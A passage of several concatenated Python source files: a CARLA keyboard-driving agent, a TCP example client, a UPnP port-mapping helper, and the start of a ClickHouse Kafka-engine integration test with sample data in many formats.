'yaw': -45.0, 'width': 300, 'height': 200, 'fov': 100, 'id': 'Left'},
{'type': 'sensor.camera.rgb', 'x': 0.7, 'y':0.4, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':45.0,
'width':300, 'height':200, 'fov': 100, 'id': 'Right'},
{'type': 'sensor.camera.rgb', 'x': -1.8, 'y': 0, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': 180.0, 'width': 300, 'height': 200, 'fov': 130, 'id': 'Rear'},
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'}
]
return sensors
def run_step(self, input_data, timestamp):
self.agent_engaged = True
time.sleep(0.1)
return self.current_control
def destroy(self):
self._hic.quit = True
self._thread.join()
class KeyboardControl(object):
def __init__(self):
self._control = carla.VehicleControl()
self._steer_cache = 0.0
def parse_events(self, control, clock):
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
control.steer = self._control.steer
control.throttle = self._control.throttle
control.brake = self._control.brake
control.hand_brake = self._control.hand_brake
def _parse_vehicle_keys(self, keys, milliseconds):
self._control.throttle = 0.6 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 15.0 * 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.95, max(-0.95, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = keys[K_SPACE]
|
example_client.py
|
# File: example_client.py
# Aim: Define example of client connection
import socket
import threading
from . import CONFIG, tools
CONFIG.logger.debug('Define components in TCP package')
class ExampleClient(object):
def __init__(self, IP, port):
# Initialize and setup client
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# Connet to IP:port
client.connect((IP, port))
name = client.getsockname()
# Report and set attributes
CONFIG.logger.info(
f'Client {name} is connected to server at {IP}:{port}')
self.client = client
self.name = name
def listen(self):
# Listen to the server
CONFIG.logger.info(f'Client {self.name} starts listening')
while True:
# Wait until new message is received
income = self.client.recv(tools.buffer_size)
CONFIG.logger.info(f'Received {income} from server')
def start(self):
# Start client connection to server
thread = threading.Thread(
target=self.listen, name='TCP connection client')
thread.setDaemon(True)
thread.start()
CONFIG.logger.info(f'Client starts listening')
# Say hello to server
self.send(f'Hello from client {self.name}')
def send(self, message):
# Send [message] to server
message = tools.encode(message)
self.client.sendall(message)
CONFIG.logger.debug(f'Sent {message} to server')
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "maize", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run maize, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
test.py
|
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
